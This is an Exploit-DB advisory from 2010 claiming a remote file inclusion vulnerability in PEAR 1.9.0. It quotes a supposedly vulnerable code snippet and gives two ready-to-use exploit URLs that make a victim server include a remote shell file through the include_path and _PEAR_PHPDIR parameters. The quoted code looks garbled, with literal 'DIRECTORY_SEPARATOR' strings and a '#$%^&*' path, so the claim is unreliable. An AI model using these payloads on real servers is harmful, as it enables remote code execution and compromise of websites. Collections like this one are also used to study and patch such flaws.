PEAR 1.9.0 - Multiple Remote File Inclusion Vulnerability

2010-02-14T00:00:00
ID EDB-ID:11442
Type exploitdb
Reporter eidelweiss
Modified 2010-02-14T00:00:00

Description

PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            ###########################################################
###
### PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability
##
###########################################################
###     PEAR, the PHP Extension and Application Repository
###
###     * @package        PEAR
###     * @Version        v.1.9.0
###     * @license        http://opensource.org/licenses/bsd-license.php New BSD License
###     * @link           http://pear.php.net/package/PEAR
###
###########################################################
###
###     Type :  Remote File Inclusion Vulnerability
###     Author: eidelweiss
###     Date  : 2010-02-14
###     Location:       Indonesia ( http://yogyacarderlink.web.id )
###     Contact:        g1xsystem [at] windowslive [dot] com
###     Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal (C)yber
###
###########################################################
###
###     Vuln:   if ('../DIRECTORY_SEPARATOR/PEAR' != '@'.'include_path'.'@') {
###                     ini_set('include_path', '../DIRECTORY_SEPARATOR/PEAR');
###                     $raw = true;
###             }
###             @ini_set('allow_url_fopen', true);
###             if (!ini_get('safe_mode')) {
###             @set_time_limit(0);
###             }
###     $_PEAR_PHPDIR = '#$%^&*';
###             define('PEAR_RUNTYPE', 'pecl');
###             require_once 'pearcmd.php';
###             require_once 'PEAR.php';
###             require_once 'PEAR/Frontend.php';
###             require_once 'PEAR/Config.php';
###             require_once 'PEAR/Command.php';
###             require_once 'Console/Getopt.php';
###     =========================================================
###     exploit:        http://victim.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?include_path=[Shell.txt?]
###             http://victim.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?_PEAR_PHPDIR =[Shell.txt?]
###########################################################